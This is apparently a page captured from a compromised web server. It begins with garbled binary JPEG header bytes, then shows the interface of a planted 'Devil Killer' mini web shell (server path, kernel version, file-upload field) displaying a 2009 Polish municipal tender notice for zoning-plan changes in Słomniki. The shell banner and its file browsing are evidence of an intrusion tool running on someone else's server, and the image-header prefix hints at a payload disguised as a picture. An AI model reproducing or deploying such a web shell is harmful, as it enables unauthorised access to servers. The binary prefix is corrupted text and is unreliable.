JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090402/88836-N-2009.html

<p class="kh_header"><b>Słomniki: Wykonanie częściowych zmian w miejscowym  planie   zagospodarowania przestrzennego gminy Słomniki, z podziałem na zadania;</b><br>
<b>Numer ogłoszenia: 88836 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słomniki , ul. Kościuszki 64, 32-090 Słomniki, woj. małopolskie, tel. 012 3881102, faks 012 3882102.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie częściowych zmian w miejscowym  planie   zagospodarowania przestrzennego gminy Słomniki, z podziałem na zadania;.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie częściowych zmian w miejscowym  planie   zagospodarowania przestrzennego gminy Słomniki, z podziałem na zadania:            
ZADANIE 1.

CZĘŚĆ A.

1.	Przedmiotem zamówienia jest sporządzenie częściowej zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Słomniki  zatwierdzonego uchwałą Nr XLV/268/98 Rady Miejskiej w Słomnikach  z dnia 26 marca 1998 r. zgodnie z uchwałą otwierającą prace planistyczne Nr XVIII/161/08  roku Rady Miejskiej w Słomnikach z dnia 26 czerwca 2008 roku, w sprawie przystąpienia do sporządzenia zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Słomniki dla działki 425/1 położonej w Prandocinie Wysiołku, w celu zmiany  przeznaczenia działki z rolnej na budowlaną ( teren zabudowy mieszkaniowej ) wraz z infrastrukturą towarzyszącą i układem komunikacyjnym.,  stosownie do ustaleń ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.) oraz przepisów wykonawczych.
  Uchwała kończąca procedurę planistyczną w w/w sprawie uchyli obowiązujące studium dla tego terenu.

2.	Zakres zamówienia obejmuje: 
2.1.	Wykonanie projektu częściowej zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Słomniki obejmujący obszar   działki 425/1 położonej w miejscowości Prandocin Wysiołek zgodnego z obowiązującym stanem prawnym a w szczególności z: 
2.1.1 art. 10 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu 	przestrzennym /Dz. U. Nr 80, poz. 717 ze zm./,
2.1.2 Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie 	wymaganego zakresu projektu miejscowego planu zagospodarowania 	przestrzennego /Dz. U. Nr 118, poz. 1233/,
2.1.3. szczególnymi, wykonawczymi: w tym m. in. sporządzenie opracowania  ekofizjograficznego zgodnie z wymogami ustawy Prawo ochrony środowiska, uzyskanie stosownych map niezbędnych do wykonania przedmiotowego opracowania, przygotowanie analizy wniosków do zmiany studium i ewentualnego uzasadnienia w przypadku nieuwzględnienia wniosków, sporządzenie projektu zmiany studium oraz jego aktualizacji, przygotowanie niezbędnych materiałów do zaopiniowania i uzgodnienia wraz z projektami pism do właściwych organów, zaprezentowanie opracowania na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej, wprowadzenie zmian     do projektu zmiany studium wynikających z uzyskanych opinii i uzgodnień, udział w dyskusji publicznej oraz przygotowanie części merytorycznej protokołu, analiza uwag złożonych do projektu zmiany studium z przygotowaniem propozycji rozpatrzenia uwag, przygotowanie uchwały z załącznikami obejmującej także uchylenie obowiązującego studium, prowadzenie dokumentacji planistycznej w celu sprawdzenia zgodności z prawem, reprezentowanie wg. potrzeb na komisjach i sesjach Rady Miejskiej w Słomnikach W przypadku zaskarżenia w/w uchwały przygotowanie pisma ustosunkowującego się do złożonej skargi.

2.2.	Sporządzenia projektu studium przez uprawnionego urbanistę.
2.3.	Przygotowanie projektów, zawiadomień, obwieszczeń, uchwał oraz prowadzenia dokumentacji planistycznej.
2.4.	Opracowanie końcowe jak i opracowania na poszczególnych etapach procedury należy złożyć w minimum trzech egzemplarzach w wersji drukowanej oraz jeden egz. w formie zapisu elektronicznego (tekst +rysunek).
2.5.	Wykonawca zobowiązany będzie ponadto do wykonania projektu studium w ilości niezbędnej do jego zaopiniowania.
2.6. ustalenia i rysunek studium (w pomniejszeniu) w formie elektronicznej - przygotowane do druku w Dzienniku Urzędowym Województwa Małopolskiego, 
2.7.Obszar objęty pracami planistycznymi wynosi: ok. 17  ha, zgodnie z załącznikiem graficznym do Uchwały Rady Miejskiej.

3.	Wykonawca jest zobowiązany do rozpoznania stopnia dostępności materiałów koniecznych do realizacji zamówienia w urzędach i instytucjach dysponujących tymi materiałami. W siedzibie zamawiającego dostępne są następujące dokumenty: uchwała Rady Miejskiej w Słomnikach  o przystąpieniu do sporządzenia zmiany studium, wnioski które wpłynęły do tutejszego Urzędu w sprawie zmian w miejscowym planie zagospodarowania  przestrzennego.
4.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia.

CZĘŚĆ B

1.Przedmiotem zamówienia jest opracowanie częściowej zmiany miejscowego planu zagospodarowania przestrzennego północnej części Gminy Słomniki obejmującego wsie: Janikowice, Januszowice, Kacice, Lipna Wola, Muniakowice, Orłów, Prandocin, Prandocin Iły, Prandocin Wysiołek, Smroków-Zagaje Smrokowskie, Wężerów zatwierdzonego Uchwałą Rady Miejskiej w  Słomnikach Nr XXXV/271/06 z dnia 20 marca 2006 roku ogłoszoną w Dzienniku Urzędowym Województwa Małopolskiego Nr 238, póz. 1670 z 18 maja 2006r., zgodnie z Uchwałą nr XVIII/162/08 Rady Miejskiej w Słomnikach z dnia 26  czerwca 2008 roku, w sprawie przystąpienia do sporządzenia zmiany tekstowej i graficznej miejscowego planu zagospodarowania przestrzennego, obejmującej teren działki 425/1 w Prandocinie Wysiołku. Tekstowa i graficzna zmiana planu polega na zmianie przeznaczenia działki ewidencyjnej 425/1 w Prandocinie Wysiołku z rolnej na budowlaną (teren zabudowy mieszkaniowej ) wraz z infrastrukturą towarzyszącą i układem komunikacyjnym.

 ZADANIE 2
 Zakres przedmiotu zamówienia obejmuje sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego Gminy Słomniki zatwierdzonego Uchwałą Nr XXXII(197)96 Rady Miejskiej w Słomnikach z 19 grudnia 1996 roku, w sprawie zmiany miejscowego planu ogólnego zagospodarowania przestrzennego miasta i gminy Słomniki ( Dz. Urz. Woj. Krakowskiego z 1997 roku.,Nr.4, poz.9.), zgodnie z Uchwałą nr XIII/117/08 Rady Miejskiej w Słomnikach z dnia 31 stycznia 2008 roku w sprawie przystąpienia do sporządzenia zmian w miejscowym planie zagospodarowania przestrzennego Gminy Słomniki. 
Zadanie  dotyczy terenu położonego w Słomnikach którego dotychczasowe przeznaczenie w planie zagospodarowania przestrzennego to: 1 UZ- usługi zdrowia  wraz z podstacją pogotowia ratunkowego, teren o powierzchni 1,3 ha.
Zmiana planu polega na zmianie przeznaczenia w/w terenu, zgodnie z załącznikiem graficznym do  Uchwałą nr XIII/117/08 Rady Miejskiej w Słomnikach z dnia 31 stycznia 2008 , Rady Miejskiej w Słomnikach, pod usługi publiczne z dopuszczeniem niepublicznych. Ustala się następujący zakres usług:
1.	Teren oznaczony nr 1- usługi zdrowia
2.	Teren oznaczony nr.2- usługi oświaty ( przedszkole, żłobek, itp.)

ZADANIE 3 
 Zakres przedmiotu zamówienia obejmuje sporządzenie zmiany w części tekstowej miejscowego planu zagospodarowania przestrzennego północnej części gminy Słomniki, obejmującego wsie Janikowice, Januszowice, Kacice, Lipna Wola, Muniakowice, Orłów, Prandocin, Prandocin-Iły, Prandocin Wysiołek, Smroków, Zagaje Smrokowskie, Wężerów, zatwierdzonego Uchwałą Rady Miejskiej w Słomnikach Nr. XXX/271/06 z dnia 20 marca 2006 roku, ogłoszoną w Dzienniku Urzędowym Województwa Małopolskiego Nr 238, poz. 1670 z dnia 18 maja 2006 roku .
Tekstowa zmiana planu dotyczy dopuszczenia budowy napowietrznej dwutorowej linii 110 kV w miejsce wskazanej w planie napowietrznej linii SN 15 kV, po dotychczasowej trasie z zachowaniem strefy technicznej ustalonej w planie.
 Zakres obszaru objętego zmianą tekstową planu określa załącznik graficzny do Uchwały Rady Miejskiej w Słomnikach Nr.XV/141/08 z dnia 18 kwietnia 2008 roku, w sprawie przystąpienia do sporządzenia zmian w części tekstowej miejscowego planu zagospodarowania przestrzennego Gminy Słomniki.


 Zmiany w miejscowym planie zagospodarowania przestrzennego ( Zadanie 1, część B, Zadanie 2, Zadanie 3)   należy wykonać zgodnie z obowiązującym stanem prawnym a w szczególności z ustaleniami określonymi  w art. 15 ust.2 ustawy z dn. 27 marca 2003r. o planowaniu i zagospodarowaniu  przestrzennym wraz z opracowaniem prognozy oddziaływania na środowisko i prognozą skutków finansowych uchwalenia planu, a także opracowaniem ekofizjograficznym .
Poza tym, po stronie wykonawcy leży: uzyskiwanie uzgodnień i opinii planu, uzyskanie zgody na zmianę przeznaczenia gruntów na cele nierolnicze i nieleśne, wprowadzanie w projekcie planu zmian wynikających z uzgodnień i rozpatrzonych uwag złożonych po wyłożeniu planu do publicznego wglądu, przygotowanie treści uchwały przyjmującej plan.
Przy sporządzaniu zlecenia należy uwzględnić przepisy rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003r w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U nr 164, poz. 1587). 
Od projektanta oczekuje się uczestniczenia w czynnościach proceduralnych: udzielanie informacji  zainteresowanym  w trakcie wyłożenia projektu,  uczestniczenie w dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu oraz udział na posiedzeniu Rady Gminy. 
Zakłada się sporządzenie rysunków planów w skali 1:1000(dla Zadania 2), w skali 1:2000 (dla Zadania 1 i 3), w tradycyjnej formie rysunkowej.
Wszystkie materiały dostarczane w formie papierowej należy również złożyć w formie elektronicznej(na nośniku CD lub DVD)
Wykonawca winien przekazać zamawiającemu prace w ilościach :
1)	rysunek planu kolorowy  - 2 egz.
2)	rysunek planu czarno-biały - 2 egz.
3)	ustalenia planu (część tekstowa) w formie tradycyjnej 
4)	ustalenia i rysunek planu (w pomniejszeniu)- przygotowane do druku w Dzienniku Urzędowym Województwa Małopolskiego, 
5)	prognoza oddziaływania na środowisko - 1 egz. 
6)	prognoza skutków finansowych planu - 1 egz.
7)	materiały do zmiany przeznaczenia gruntów rolnych na cele nierolnicze i nieleśne - 1 egz.
8)	materiały formalno-prawne - 1 egz.

Zakup podkładów mapowych leży po stronie Zamawiającego.


Termin realizacji zamówienia:
 16 miesięcy dla Zadania I, 12 miesięcy dla zadania II i 12 miesięcy dla zadania III od dnia podpisania umowy i dostarczenia przez zamawiającego materiałów wyjściowych do projektowania.
Zamawiający dopuszcza możliwość przedłużenia terminu realizacji zamówienia tylko w przypadku wystąpienia okoliczności powodujących opóźnienie nie wynikających z winy Wykonawcy. Zmiana terminu zakończenia realizacji może nastąpić tylko w  przypadku jej akceptacji prze Zamawiającego. Wymaga formy pisemnej w formie aneksu do umowy. Zamawiający wyrazi zgodę na przedłużenie terminu tylko w przypadku  potwierdzenia wystąpienia okoliczności niezależnych od Wykonawcy w szczególności powodem takim mogą być okoliczności związane z przedłużającymi się terminami uzyskania stosownych uzgodnień/opinii itp. Zamawiający zaakceptuje zmianę terminu tylko wtedy gdy pomimo dochowania należytej staranności ze strony Wykonawcy nie może on  dotrzymać terminu zakończenia realizacji umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium- NA KAŻDE ZADANIE ODDZIELNIE

Ustala się wniesienie wadium w wysokości
Zadanie I 1.000,00 zł  słownie: jeden tysiąc złotych
Zadanie II 500,00 zł słownie:  pięćset złotych
Zadanie III 800,00 zł  słownie: osiemset złotych 

Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:

a)	w pieniądzu, sposób przekazania: przelew na konto zamawiającego BS Słomniki 
39 8614 0001 0000 0000 0420 0019 
Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uważa wadium, które 
w oznaczonym terminie (przed upływem terminu składania ofert) znajdzie się na koncie Zamawiającego - data uznania rachunku Zamawiającego (zaleca się wpłatę najpóźniej do dnia poprzedzającego dzień składania ofert z uwagi na operacje bankowe). 
Wpłacając wadium w formie przelewu w tytule  należy wpisać: Wykonanie zmian w planie - Zadanie......(numer zadania)

b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
c)	w gwarancjach bankowych
d)	w gwarancjach ubezpieczeniowych 
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.)
 sposób przekazania wadium w formie dokumentu : oryginał Kasa Urzędu Miejskiego w Słomnikach ul. Kościuszki 64.

4. Zwrot wadium nastąpi:
Zamawiający zwraca niezwłocznie wadium
po upływie terminu związania z ofertą 
po zawarciu umowy w sprawie zamówienia publicznego wraz z wniesieniem zabezpieczenia należytego wykonania umowy.
Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Z zastrzeżeniem ust. 4A,Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy
który wycofał ofertę przed upływem terminu składania ofert. 
który został wykluczony z postępowania
którego oferta została odrzucona 
 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w art.25 ust.1, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie.
Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

 W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.

O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:

1.1	Posiadający uprawnienia do wykonywania określonej działalności lub czynności,                   jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2	Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
 1.3	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

 1 	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4, 
 2 	podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
 3 	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
 4 	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
 5 	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3, PZP	
 6 	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą, 
 
3. Zamawiający odrzuca ofertę wykonawcy:

1.	niezgodną z ustawą lub której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust.2 pkt.3 Prawa zamówień publicznych
2.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
3.	zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,  
4.	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
5.	zawiera błędy w obliczeniu ceny 
6.	 wykonawcy który  w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
7.	nieważną na podstawie odrębnych przepisów, 
8.	nie zabezpieczoną wadium, w tym również na przedłużony okres związania ofertą, lub który nie wyraził zgody na przedłużenie okresu związania ofertą,

4.Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5.Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą dokumentów potwierdzających spełnienie warunków.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
      -Formularz ofertowy -  z wykorzystaniem wzoru - załącznik nr 1 do SIWZ 
      -Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne-                          z wykorzystaniem wzoru - załącznik nr 2 do SIWZ 
      - Projekt umowy - parafowany z wykorzystaniem wzoru - załącznik nr 3 do SIWZ 
 -wykaz osób do kontaktów z zamawiającym odpowiedzialnych za wykonanie zobowiązań              umowy -z wykorzystaniem wzoru - załącznik nr 4 do SIWZ    

B.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty:
  
  B.2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
   B.3) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
   B.4) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  
   B.5) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
  B.6) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
 
C.1) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.( wzór zał 5 do SIWZ)
C1.1 pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował.  
C.2) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia tj. posiadają uprawnienia urbanistyczne wraz z aktualnym zaświadczeniem Okręgowej Izby  Urbanistów o przynależności do Izby i opłaconych na jej rzecz składkach. 

D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
  
D.1) -Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  

E. Wykonawca  zamieszkały poza terytorium Rzeczypospolitej Polskiej:

 E.1) Zamiast dokumentów, o których mowa w pkt. B.2), B.4), B.6) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu 

E.2) Zamiast dokumentu, o którym mowa w pkt. B.6) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 

